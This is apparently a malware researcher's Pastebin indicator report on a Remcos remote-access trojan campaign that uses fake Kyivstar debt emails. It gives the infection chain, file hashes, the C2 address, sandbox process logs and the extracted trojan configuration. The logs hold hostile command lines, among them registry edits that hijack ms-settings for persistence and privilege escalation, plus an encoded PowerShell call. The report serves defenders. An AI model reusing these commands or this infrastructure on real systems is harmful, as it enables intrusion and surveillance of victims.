API tools faq
paste
VRad

#remcos_211223

VRad
Dec 21st, 2023 (edited)
543
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.34 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #remcos #SMB #RAT #mic #keylog #scr
  2.  
  3. https://pastebin.com/samYnJq6
  4.  
  5. previous_contact:
  6. 30/11/23 https://pastebin.com/aG6XyqHN
  7. 13/11/23 https://pastebin.com/tbRpiGG5
  8. 06/02/23 https://pastebin.com/kjv5E8Au
  9. 12/07/21 https://pastebin.com/ZYZarB9L
  10. 15/07/19 https://pastebin.com/ZxG6eRWM
  11.  
  12. FAQ:
  13. https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
  14.  
  15. attack_vector
  16. --------------
  17. email > att1 .zip > att2 + att3 .RAR > att4.RAR (pwd) > .doc (vba) > SMB \\89_23_98_22\LN\GB.exe > bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
  18.  
  19. # # # # # # # #
  20. email_headers
  21. # # # # # # # #
  22. Date: Wed, 20 Dec 2023 22:39:50 -0800
  23. From: Лелюк Йоханес Вітанович <dj@benno.at>
  24. Subject: Заборгованість за договором Київстар – Передсудове
  25. Received: from mx20lb.world4you.com ([81.19.149.130])
  26. Received: from [94.131.102.115] (helo=98.159.36.138) by mx20lb.world4you.com with esmtpa (Exim 4.96.2)
  27. Reply-To: "info@kyivstar.net" <info@kyivstar.net>
  28.  
  29. # # # # # # # #
  30. files
  31. # # # # # # # #
  32.  
  33. SHA-256 8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a
  34. File name Заборгованість абонента.zip [ Zip archive data, at least v1.0 to extract ]
  35. File size 508.35 KB (520555 bytes)
  36.  
  37. SHA-256 ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449
  38. File name Заборгованість абонента.part1.rar [ RAR archive data, v5 ]
  39. File size 350.00 KB (358400 bytes)
  40.  
  41. SHA-256 9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba
  42. File name Заборгованість абонента.part2.rar [ RAR archive data, v5 ]
  43. File size 157.52 KB (161301 bytes)
  44.  
  45. SHA-256 823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827
  46. File name Заборгованість абонента.rar [RAR archive data, v5] !PWD
  47. File size 506.79 KB (518958 bytes)
  48.  
  49. SHA-256 93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7
  50. File name Заборгованість абонента.doc [ MS Word Document ] !VBA
  51. File size 672.00 KB (688128 bytes)
  52.  
  53. SHA-256 d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c
  54. File name GB.exe [ PE32+ executable ] !Loader
  55. File size 262.50 KB (268800 bytes)
  56.  
  57. SHA-256 7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c
  58. File name test2.exe [ PE32+ executable ] !Loader
  59. File size 172.00 KB (176128 bytes)
  60.  
  61. SHA-256 6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d
  62. File name wsuscr.exe [ .NET executable ] !Payload - remcos
  63. File size 14.92 MB (15644672 bytes)
  64.  
  65. # # # # # # # #
  66. activity
  67. # # # # # # # #
  68.  
  69. PL_SCR bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
  70.  
  71.  
  72. C2 45_87_155_41 : 8080
  73.  
  74. netwrk
  75. --------------
  76. 89_23_98_22 445 SMB2 Tree Connect Request Tree: \\89_23_98_22\IPC$
  77. 89_23_98_22 445 SMB2 Create Request File: GB.exe
  78. 104_192_141_1 443 TLSv1 bitbucket_org Client Hello
  79.  
  80. comp
  81. --------------
  82. System TCP 89_23_98_22 445 ESTABLISHED
  83. powershell.exe TCP 104_192_141_1 443 ESTABLISHED
  84.  
  85. proc
  86. --------------
  87. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n
  88. C:\Windows\SysWOW64\explorer.exe "\\89.23.98.22\LN\"
  89. \??\UNC\89.23.98.22\LN\GB.exe "\\89.23.98.22\LN\GB.exe"
  90. C:\Windows\system32\cmd.exe /c res.bat && test2.exe
  91. C:\Windows\system32\cmd.exe /S /D /c" echo f
  92. C:\Windows\system32\xcopy.exe xcopy /s test2.exe "C:\TEMP\persistent2\test2.exe"
  93. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String ...
  94.  
  95. C:\Windows\system32\reg.exe add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
  96.  
  97. C:\Windows\system32\reg.exe add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
  98. C:\Windows\system32\reg.exe delete HKCU\Software\Classes\.omg\ /f
  99. C:\Windows\system32\reg.exe delete HKCU\Software\Classes\ms-settings\ /f
  100.  
  101. C:\Users\operator\AppData\Roaming\wsuscr.exe
  102. C:\ProgramData\wsus\wsus.exe
  103.  
  104. C:\TEMP\IXP000.TMP\test2.exe
  105. C:\Windows\system32\cmd.exe /c "test2.bat"
  106. C:\Windows\system32\net.exe session
  107. C:\Windows\system32\net1.exe session
  108.  
  109. persist
  110. --------------
  111. HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
  112.  
  113. drop
  114. --------------
  115. %temp%\test2.exe
  116. %appdata%\wsuscr.exe
  117. ProgramData\wsus\wsus.exe
  118.  
  119. # # # # # # # #
  120. additional info
  121. # # # # # # # #
  122. malware_config
  123. {
  124. "Version": "4.9.3 Pro",
  125. "Host:Port:Password": "45_87_155_41 : 8080",
  126. "Assigned name": "wsus",
  127. "Connect interval": "1",
  128. "Install flag": "Enable",
  129. "Setup HKCU\\Run": "Enable",
  130. "Setup HKLM\\Run": "Enable",
  131. "Install path": "Application path",
  132. "Copy file": "wsus.exe",
  133. "Startup value": "Disable",
  134. "Hide file": "Disable",
  135. "Mutex": "dvwsus-SFNWWW",
  136. "Keylog flag": "0",
  137. "Keylog path": "Application path",
  138. "Keylog file": "logs.dat",
  139. "Keylog crypt": "Disable",
  140. "Hide keylog file": "Disable",
  141. "Screenshot flag": "Disable",
  142. "Screenshot time": "10",
  143. "Take Screenshot option": "Disable",
  144. "Take screenshot title": "",
  145. "Take screenshot time": "5",
  146. "Screenshot path": "AppData",
  147. "Screenshot file": "Screenshots",
  148. "Screenshot crypt": "Disable",
  149. "Mouse option": "Disable",
  150. "Delete file": "Disable",
  151. "Audio record time": "5"
  152. }
  153.  
  154.  
  155. other_files_from_SMB
  156. https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
  157. https://www.virustotal.com/gui/file/9cd6bd7e4391a92c402118c4d4541c65a9ae4996ad2c37384967e620f2452dca/details
  158. https://www.virustotal.com/gui/file/961b36bb78d27b3432fae08e5c4272fe295b5e24e832c6f6bf1ec3cf87057dab/details
  159. https://www.virustotal.com/gui/file/efa2f3a45664c73d2283d5acc094013466de47753b795193dd37f2e54a13b34a/details
  160. https://www.virustotal.com/gui/file/72d683597d351182d5ceaf884e2f028eddf3bf9a53fdb166024191720efc49ff/details
  161. https://www.virustotal.com/gui/file/800cd06e420db368d76de6067d887fb0a801ed31b787efbfde248ff28168eb54/details
  162. https://www.virustotal.com/gui/file/34318cdef0cad69ba0ba6f68b42fdd5c581abdbc4feceeab73bc13c56840e7fa/details
  163. https://www.virustotal.com/gui/file/10cef0b0f286a3f715aaad09fa089a97c10b98cf01cbae4c702eb49c7331f461/details
  164. https://www.virustotal.com/gui/file/ff0a84220d028052a841312cd81baa525d19f7e4b0ce94dbbaf6634a776d3814/details
  165. https://www.virustotal.com/gui/file/f58add586ed2fd30ffc10eff51f55f859eff1e7870743d46a5cfdc7b76a5e308/details
  166. https://www.virustotal.com/gui/file/07c6deac35b7070d7d9ded3fca62d976c054c1ad8e466a822543cee33ea04437/details
  167. https://www.virustotal.com/gui/file/15399042016065429443742d3638917dffec34e0ae6921d4b10ba9b5c2bf4353/details
  168. https://www.virustotal.com/gui/file/3c8861781bc5c16b4490863e238c5dc72fbe6586a1ee36df8989e7993a9c46b3/details
  169. https://www.virustotal.com/gui/file/24ab05b58fefbbaddf9d332076e9f9764a3610d7985be88dd6054d68ec991618/details
  170. https://www.virustotal.com/gui/file/6d8628ee670cea59d5314f18aacb449b858e9194a78d4256342999798b54ad13/details
  171. # # # # # # # #
  172. VT & Intezer
  173. # # # # # # # #
  174. https://www.virustotal.com/gui/file/8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a/details
  175. https://www.virustotal.com/gui/file/ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449/details
  176. https://www.virustotal.com/gui/file/9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba/details
  177. https://www.virustotal.com/gui/file/823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827/details
  178. https://www.virustotal.com/gui/file/93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7/details
  179. https://analyze.intezer.com/analyses/268883ca-795e-449b-98aa-3166b2384fea/behavior
  180. https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
  181. https://analyze.intezer.com/analyses/113f3f5c-ddc5-4bb5-aa7b-e3d114b44a2b/behavior
  182. https://www.virustotal.com/gui/file/7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c/details
  183. https://www.virustotal.com/gui/file/6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d/details
  184.  
  185. VR
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!